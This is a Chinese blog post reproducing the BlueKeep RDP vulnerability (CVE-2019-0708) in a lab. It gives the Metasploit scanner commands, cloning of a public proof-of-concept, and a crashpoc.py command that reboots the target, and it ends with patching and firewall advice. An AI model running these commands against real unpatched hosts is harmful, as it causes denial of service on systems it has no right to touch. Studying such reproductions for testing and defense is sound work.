当前位置:首页 > 信息安全 > 正文内容

CVE-2019-0708_RDP漏洞利用

七星2年前 (2019-12-10)信息安全546

漏洞简介:

 

基于Windows系列服务器系列漏洞,在2019年5月15日被公开,级别属于高危漏洞,利用方式简单,通过3389端口,RDP协议进行攻击。这个漏洞是今年危害严重性最大的漏洞

受影响的操作系统有:windows2003、windows2008、windows2008 R2、windows xp 、win7

 

环境搭建:


测试机:kali IP    192.168.231.142

image.png

靶机: win2008 IP   192.168.137.143(开放3389端口)

image.png 

工具:360_RDP漏洞扫描工具(解压密码:qx)
POC:
https://github.com/n1xbyte/CVE-2019-0708

 

漏洞复现:

 

1. nmap扫描3389端口是否开放

image.png 


2.漏洞扫描

可以使用360提供的扫描工具:

image.png 

可以看见直接爆了漏洞


同样的,也可以使用msf进行扫描

msf5 > search 0708    #查找是否有 CVE-2019-0708模块如果没有,则需要更新

apt-get install metasploit-framework #更新msf模块

msf5 > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep  #利用漏洞扫描模块

msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > show options  #查看参数

msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set rhosts 192.168.231.143 #设置靶机IP

msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > run  #运行

image.png 

一样的,直接爆

 

漏洞利用:

 

1. kali里默认没有pip3,先安装pip3(如果以前安装了,就直接安装impacket库),再安装impacket库

apt-get install python3-pip   #安装pip3

pip3 install impacket     #安装impacket库

2. 克隆CVE-2019-0708,并cd到该目录

git clone https://github.com/n1xbyte/CVE-2019-0708.git

cd CVE-2019-0708

image.png 

3. 最后,就是攻击了.

python3 crashpoc.py 192.168.231.143 64  #python3 crashpoc.py ip地址 系统类型

image.png 

靶机直接重启了.

image.png 

 

写在最后:

 

这个漏洞能做的事情,远远没有重启这么简单,建议:

1. 关闭3389端口或添加防火墙安全策略限制对3389端口的访问

2. 及时打对应系统的安全补丁


作者:七星

QQ:320406741

 


七星|qixingbit.com

相关文章

CTF中关于RSA算法的攻击方式

CTF中关于RSA算法的攻击方式

RSA算法本身是安全的.但是他的不正确用法使得RSA算法的攻击成功率提高了.RSA算法在之前的文章中详细的介绍了.其攻击的核心就是获取两个大素数p和q.RSA算法也是针对c, m, e, d, n,...

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。